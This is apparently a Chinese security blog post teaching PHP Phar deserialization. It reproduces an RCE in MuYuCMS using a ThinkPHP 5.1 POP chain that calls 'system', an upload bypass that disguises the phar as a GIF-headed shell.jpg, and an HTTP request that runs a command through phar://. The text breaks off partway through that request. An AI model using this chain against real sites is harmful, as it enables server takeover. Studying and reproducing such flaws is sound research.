

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/2.png">
  <link rel="icon" href="/img/2.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Yf3te">
  <meta name="keywords" content="">
  
    <meta name="description" content="Phar、Session反序列化通过简单的漏洞demo，MuYuCMS的Phar反序列化复现总结帮助大家理解一下这两个反序列化，如有错误，还请斧正！ Phar反序列化基本介绍Phar反序列化不依赖unserialize()函数进行反序列化。而是构造phar文件，以序列化的形式存储用户自定义的meta-data这一特性，phar_parse_metadata在解析meta数据时，会调用php_v">
<meta property="og:type" content="article">
<meta property="og:title" content="一文领悟Phar、Session反序列化">
<meta property="og:url" content="http://example.com/2025/02/05/%E4%B8%80%E6%96%87%E9%A2%86%E6%82%9FPhar%E3%80%81Session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Yf3te--枯木怯逢春...">
<meta property="og:description" content="Phar、Session反序列化通过简单的漏洞demo，MuYuCMS的Phar反序列化复现总结帮助大家理解一下这两个反序列化，如有错误，还请斧正！ Phar反序列化基本介绍Phar反序列化不依赖unserialize()函数进行反序列化。而是构造phar文件，以序列化的形式存储用户自定义的meta-data这一特性，phar_parse_metadata在解析meta数据时，会调用php_v">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/11.jpg">
<meta property="article:published_time" content="2025-02-05T14:29:59.000Z">
<meta property="article:modified_time" content="2025-02-05T14:33:05.891Z">
<meta property="article:author" content="Yf3te">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/11.jpg">
  
  
  
  <title>一文领悟Phar、Session反序列化 - Yf3te--枯木怯逢春...</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">
<link rel="stylesheet" href="/css/cloudedGlass.css">
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":50,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"ground_glass":{"enable":true},"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"nPsiBpqAh9nfJ5Dy1WuaF7QX-MdYXbMMI","app_key":"uHgPDZvMgamWIL1SjZs4NpY4","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Yf3_te的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/12.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="一文领悟Phar、Session反序列化"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-02-05 22:29" pubdate>
          2025年2月5日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          29 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">一文领悟Phar、Session反序列化</h1>
            
            
              <div class="markdown-body">
                
                <meta name="referrer" content="no-referrer"/>

<h1 id="Phar、Session反序列化"><a href="#Phar、Session反序列化" class="headerlink" title="Phar、Session反序列化"></a>Phar、Session反序列化</h1><p>通过简单的<strong>漏洞demo</strong>，<strong>MuYuCMS的Phar反序列化</strong>复现总结帮助大家理解一下这两个反序列化，如有错误，还请斧正！</p>
<h2 id="Phar反序列化"><a href="#Phar反序列化" class="headerlink" title="Phar反序列化"></a>Phar反序列化</h2><h3 id="基本介绍"><a href="#基本介绍" class="headerlink" title="基本介绍"></a>基本介绍</h3><p>Phar反序列化不依赖unserialize()函数进行反序列化。而是构造phar文件，以序列化的形式存储用户自定义的meta-data这一特性，<code>phar_parse_metadata</code>在解析meta数据时，会调用<code>php_var_unserialize</code>进行反序列化操作。具体解析代码。该方法需要在文件系统函数（file_exits()、is_dir()等）参数可控的情况下，配合phar:&#x2F;&#x2F;伪协议直接进行反序列化。<strong>即本地构造phar文件把恶意代码本地序列化好，再通过文件上传功能点上传phar文件至目标网站，最后用phar协议配合文件系统函数反序列化phar文件，达到预期目的。</strong></p>
<h3 id="phar文件简介"><a href="#phar文件简介" class="headerlink" title="phar文件简介"></a>phar文件简介</h3><figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs haskell"><span class="hljs-title">phar</span>文件是一种打包形式，把php代码和其他资源（图像、表等）捆绑到一个归档文件中来实现应用程序和库的开发，跟jar文件差不多。本质上是一个压缩文件，会议序列化的形式存储用户在自定义的meta-<span class="hljs-class"><span class="hljs-keyword">data</span>内的内容</span><br></code></pre></td></tr></table></figure>

<h3 id="phar文件组成"><a href="#phar文件组成" class="headerlink" title="phar文件组成"></a>phar文件组成</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php">stub:phar文件的标志，必须以 xxx <span class="hljs-title function_ invoke__">__HALT_COMPILER</span>();<span class="hljs-meta">?&gt;</span> 结尾，否则无法识别。xxx可以为自定义内容。<br><span class="hljs-comment">//简单地说就是告诉系统自己是一个什么样的文件,声明文件后缀</span><br><br>manifest:phar文件本质上是一种压缩文件，其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data，这是漏洞利用最核心的地方。<br><span class="hljs-comment">//存放序列化的内容</span><br><br>content:被压缩文件的内容<br><br><span class="hljs-title function_ invoke__">signature</span> (可空):签名，放在末尾。<br></code></pre></td></tr></table></figure>

<h3 id="实现方法"><a href="#实现方法" class="headerlink" title="实现方法"></a>实现方法</h3><h4 id="0x01、生成phar文件"><a href="#0x01、生成phar文件" class="headerlink" title="0x01、生成phar文件"></a>0x01、生成phar文件</h4><p><strong>1、环境准备</strong></p>
<p>php版本：php&gt;&#x3D;5.2</p>
<p><img src="https://s2.loli.net/2025/02/05/aDftXUbK3k6Oi9L.png" srcset="/img/loading.gif" lazyload alt="image-20250203135055987"></p>
<p>php.ini配置：phar.readonly设为Off，修改之后要重新启动phpstudy，让配置生效。</p>
<p><img src="https://s2.loli.net/2025/02/05/xvlgUPVaNjYT4nC.png" srcset="/img/loading.gif" lazyload alt="image-20250203135214743"></p>
<hr>
<p><strong>2、phar代码</strong></p>
<p>下面是用于生成phar文件的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">AnyClass</span></span>&#123;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$output</span> = <span class="hljs-string">&#x27;phpinfo();&#x27;</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span> -&gt; output);<br>    &#125;<br>&#125;<br>@<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-string">&quot;phar.phar&quot;</span>);<br><span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&quot;phar.phar&quot;</span>); <span class="hljs-comment">//后缀名必须为phar</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">startBuffering</span>();<br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&quot;GIF89a&quot;</span>.<span class="hljs-string">&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;</span>); <span class="hljs-comment">//设置stub</span><br><span class="hljs-variable">$o</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">AnyClass</span>();<br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setMetadata</span>(<span class="hljs-variable">$o</span>); <span class="hljs-comment">//将自定义的meta-data存入manifest</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&quot;test.txt&quot;</span>, <span class="hljs-string">&quot;test&quot;</span>); <span class="hljs-comment">//添加要压缩的文件</span><br><span class="hljs-comment">//签名自动计算</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">stopBuffering</span>();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/02/05/AayHIbuOgLSRcmN.png" srcset="/img/loading.gif" lazyload alt="image-20250203135655646"></p>
<p>然后我们访问上述1.php文件，即可生成phar文件</p>
<p><img src="https://s2.loli.net/2025/02/03/fh7Tc8gdkGVCSpP.png" srcset="/img/loading.gif" lazyload alt="image-20250203140543271"></p>
<p>成功生成</p>
<p><img src="https://s2.loli.net/2025/02/05/7D35iZU9lEeWSwq.png" srcset="/img/loading.gif" lazyload alt="image-20250203140612123"></p>
<p>进一步查看，这也就生成了一个phar文件</p>
<p><img src="https://s2.loli.net/2025/02/03/yFCjo2TE1kcGrZ8.png" srcset="/img/loading.gif" lazyload alt="image-20250203140726270"></p>
<h4 id="0x02、实现反序列化"><a href="#0x02、实现反序列化" class="headerlink" title="0x02、实现反序列化"></a>0x02、实现反序列化</h4><p>漏洞实现前提</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">1.phar文件要能够上传到服务器端。<br>2.要有可用的魔术方法作为“跳板”。<br>3.文件操作函数的参数可控，且   <span class="hljs-string">./</span>    <span class="hljs-string">../</span>    phar等特殊字符没有被过滤<br></code></pre></td></tr></table></figure>

<h5 id="文件操作函数"><a href="#文件操作函数" class="headerlink" title="文件操作函数"></a>文件操作函数</h5><p>php大部分的文件系统函数在通过phar:&#x2F;&#x2F;伪协议解析phar文件时，都会将meta-data进行反序列化</p>
<p><img src="https://s2.loli.net/2025/02/05/RK63ovq5Nlj1kdB.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="开审"><a href="#开审" class="headerlink" title="开审"></a>开审</h3><p>这里使用MuYuCMS的一个phar反序列化做演示。安装就跳过了，直接开始看代码</p>
<p>对于phar的挖掘，我们的着手点主要是<strong>文件操作函数、可控魔术方法</strong></p>
<p>我们就以文件操作函数为引，全局检索：is_dir()函数，发现一处函数的参数可控</p>
<p><img src="https://s2.loli.net/2025/02/05/V8ExFINKdLr9PYl.png" srcset="/img/loading.gif" lazyload alt="image-20250204093113453"></p>
<p><img src="https://s2.loli.net/2025/02/04/1StV95iTafpUB8O.png" srcset="/img/loading.gif" lazyload alt="image-20250204100644225"></p>
<p>为了更快了解传参的方式，进一步检索cutformadd，直接用定位页面，然后抓包的形式，来快速地弄清楚传参方式。但是又发现这个方法是灰色的，就说明没有调用，但是事实并非如此，这个CMS应该是直接用html页面绑定某一个函数地形式。（如下）</p>
<p><img src="https://s2.loli.net/2025/02/04/nSauMqNYjxeVioW.png" srcset="/img/loading.gif" lazyload alt="image-20250204100945110"></p>
<p>于是我们直接登录去找页面即可，我们直接访问admin&#x2F;template&#x2F;cutformadd，发现是报错了<img src="https://s2.loli.net/2025/02/05/NGVbjDiaHkrL7Pw.png" srcset="/img/loading.gif" lazyload alt="image-20250204101616098"></p>
<p>稍微分析一下常规路由，是以<code>/admin.php/index/index.html</code>，这种形式存在的，有&#x2F;admin.php&#x2F;，这种形式，我们直接访问admin.php&#x2F;template&#x2F;cutformadd即可</p>
<p><img src="https://s2.loli.net/2025/02/05/FN1vPkLlJUxaHbg.png" srcset="/img/loading.gif" lazyload alt="image-20250204101743973"></p>
<p>但是光有文件操作函数还是不足以反序列化，还要找链子，根据这个路由的形式我们很容易判断，这其实是一个TP框架。下载项目的时候我们也能看见</p>
<p><img src="https://s2.loli.net/2025/02/04/dGoArLcHSBNU4fk.png" srcset="/img/loading.gif" lazyload alt="image-20250204102015964"></p>
<p>主播主播，找链子还是太吃操作了，有没有简单有强势的方法推荐一下呢？有的兄弟，有的，这个经典流行框架，我们直接去网上翻个比较通用的链子利用即可！上大哥</p>
<p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/2307">ThinkPHP5.1反序列化实现rce</a>，这里就有通用的链子，我们稍作修改呢！什么？还要改？我不太了解tp框架啊，懵了。。。没事还有大哥撑腰，<a target="_blank" rel="noopener" href="https://forum.butian.net/share/2678%EF%BC%8C%E6%88%91%E4%BB%AC%E7%9B%B4%E6%8E%A5%E7%94%A8exp%E5%8D%B3%E5%8F%AF%E3%80%82**%E7%9B%B4%E6%8E%A5%E7%AB%99%E5%9C%A8%E4%B8%A4%E4%B8%AA%E5%B7%A8%E4%BA%BA%E7%9A%84%E8%82%A9%E8%86%80%E4%B8%8A**%EF%BC%8C%E5%9C%A8%E9%93%BE%E5%AD%90%E4%B8%AD%E5%8A%A0%E5%85%A5%E4%B8%80%E4%B8%AA%E4%B8%BB%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%EF%BC%8C%E5%B9%B6%E5%9C%A8%E5%85%B6%E4%B8%AD%E6%B7%BB%E5%8A%A0%E7%94%9F%E6%88%90Phar%E6%96%87%E4%BB%B6%E7%9A%84%E4%BB%A3%E7%A0%81%EF%BC%8C%60TestObject%60%E9%9C%80%E8%A6%81%E6%9B%BF%E6%8D%A2%E6%88%90%E9%93%BE%E5%AD%90%E4%B8%AD%E7%9A%84%E5%85%A5%E5%8F%A3%E7%B1%BB%60Windows%60%E3%80%82">https://forum.butian.net/share/2678，我们直接用exp即可。**直接站在两个巨人的肩膀上**，在链子中加入一个主命名空间，并在其中添加生成Phar文件的代码，`TestObject`需要替换成链子中的入口类`Windows`。</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">think</span>&#123;<br>    <span class="hljs-title class_">abstract</span> <span class="hljs-title class_">class</span> <span class="hljs-title class_">Model</span>&#123;<br>        <span class="hljs-title class_">protected</span> $<span class="hljs-title class_">append</span> = [];<br>        <span class="hljs-keyword">private</span> <span class="hljs-variable">$data</span> = [];<br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;append = [<span class="hljs-string">&quot;l1_Tuer&quot;</span>=&gt;[<span class="hljs-string">&quot;123&quot;</span>]];<br>            <span class="hljs-variable language_">$this</span>-&gt;data = [<span class="hljs-string">&quot;l1_Tuer&quot;</span>=&gt;<span class="hljs-keyword">new</span> <span class="hljs-title class_">Request</span>()];<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Request</span></span>&#123;<br>        <span class="hljs-keyword">protected</span> <span class="hljs-variable">$hook</span> = [];<br>        <span class="hljs-keyword">protected</span> <span class="hljs-variable">$filter</span> = <span class="hljs-string">&quot;system&quot;</span>;<br>        <span class="hljs-keyword">protected</span> <span class="hljs-variable">$config</span> = [<br>            <span class="hljs-string">&#x27;var_ajax&#x27;</span>         =&gt; <span class="hljs-string">&#x27;_ajax&#x27;</span>,  <br>        ];<br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;filter = <span class="hljs-string">&quot;system&quot;</span>;<br>            <span class="hljs-variable language_">$this</span>-&gt;config = [<span class="hljs-string">&quot;var_ajax&quot;</span>=&gt;<span class="hljs-string">&#x27;&#x27;</span>];<br>            <span class="hljs-variable language_">$this</span>-&gt;hook = [<span class="hljs-string">&quot;visible&quot;</span>=&gt;[<span class="hljs-variable language_">$this</span>,<span class="hljs-string">&quot;isAjax&quot;</span>]];<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">think</span>\<span class="hljs-title class_">process</span>\<span class="hljs-title class_">pipes</span>&#123;<br>    <span class="hljs-title class_">use</span> <span class="hljs-title class_">think</span>\<span class="hljs-title class_">model</span>\<span class="hljs-title class_">concern</span>\<span class="hljs-title class_">Conversion</span>;<br>    <span class="hljs-keyword">use</span> <span class="hljs-title">think</span>\<span class="hljs-title">model</span>\<span class="hljs-title">Pivot</span>;<br><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Windows</span></span>&#123;<br>        <span class="hljs-keyword">private</span> <span class="hljs-variable">$files</span> = [];<br>        <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;files=[<span class="hljs-keyword">new</span> <span class="hljs-title class_">Pivot</span>()];<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">think</span>\<span class="hljs-title class_">model</span>&#123;<br>    <span class="hljs-title class_">use</span> <span class="hljs-title class_">think</span>\<span class="hljs-title class_">Model</span>;<br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Pivot</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Model</span></span>&#123;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">namespace</span>&#123;<br>    <span class="hljs-title class_">use</span> <span class="hljs-title class_">think</span>\<span class="hljs-title class_">process</span>\<span class="hljs-title class_">pipes</span>\<span class="hljs-title class_">Windows</span>;<br>    <span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&quot;shell.phar&quot;</span>);<br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">startBuffering</span>();<br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&quot;GIF89a&quot;</span>.<span class="hljs-string">&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;</span>); <span class="hljs-comment">//设置stub，增加gif文件头</span><br>    <span class="hljs-variable">$o</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Windows</span>();<br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setMetadata</span>(<span class="hljs-variable">$o</span>); <span class="hljs-comment">//将自定义meta-data存入manifest</span><br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&quot;test.txt&quot;</span>, <span class="hljs-string">&quot;test&quot;</span>); <span class="hljs-comment">//添加要压缩的文件</span><br>    <span class="hljs-comment">//签名自动计算</span><br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">stopBuffering</span>();<br>    <span class="hljs-keyword">echo</span> (<span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">Windows</span>())));<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><code>$this-&gt;$config = [&#39;var_ajax&#39;=&gt;&#39;&#39;,];</code>如果设置为空，那我们get传入的变量名可以为任意值。但是定义了之后，get传入的变量名就只能是我们定义的变量名。比如使用<code>$this-&gt;$config = [&#39;var_ajax&#39;=&gt;&#39;cmd&#39;,];</code>，则get需要传递<code>cmd=xxxx</code>。</p>
<p>先访问生成phar文件</p>
<p><img src="https://s2.loli.net/2025/02/05/pxLtGsQbhDCI7og.png" srcset="/img/loading.gif" lazyload alt="image-20250204104143920"></p>
<p><img src="https://s2.loli.net/2025/02/05/GR6TWkLX9sJ1zdp.png" srcset="/img/loading.gif" lazyload alt="image-20250204104202286"></p>
<p>再翻翻找找文件上传点</p>
<p><img src="https://s2.loli.net/2025/02/05/q4z9kfQOBxmM83c.png" srcset="/img/loading.gif" lazyload alt="image-20250204104446625"></p>
<p>上传失败</p>
<p><img src="https://s2.loli.net/2025/02/04/TRhvUulimA9JYyB.png" srcset="/img/loading.gif" lazyload alt="image-20250204104530390"></p>
<p>这就用一个绕过手法了。我们前面提及到phar文件的内容的sub是phar文件的标准格式，也就是CMS可以根据这个文件内部的格式来进行解析，而不是局限于文件后缀，于是我们直接修改一下后缀为shell.jpg，再上传</p>
<p><img src="https://s2.loli.net/2025/02/05/3GPY2i1ArOVoINR.png" srcset="/img/loading.gif" lazyload alt="image-20250204104839752"></p>
<p>直接成功上传了</p>
<p><img src="https://s2.loli.net/2025/02/05/2KsGf1xX3S8HJBU.png" srcset="/img/loading.gif" lazyload alt="image-20250204105310336"></p>
<p>现在直接用phar协议构造payload（路径可以用.&#x2F;尝试出来），即可rce</p>
<p><img src="https://s2.loli.net/2025/02/05/hjcXlgB37fmePxF.png" srcset="/img/loading.gif" lazyload alt="image-20250204105508277"></p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/admin.php/template/cutformadd.html?cmd=type%20c:\\windows\win.ini</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>muyucms<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>application/json, text/javascript, */*; q=0.01<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: 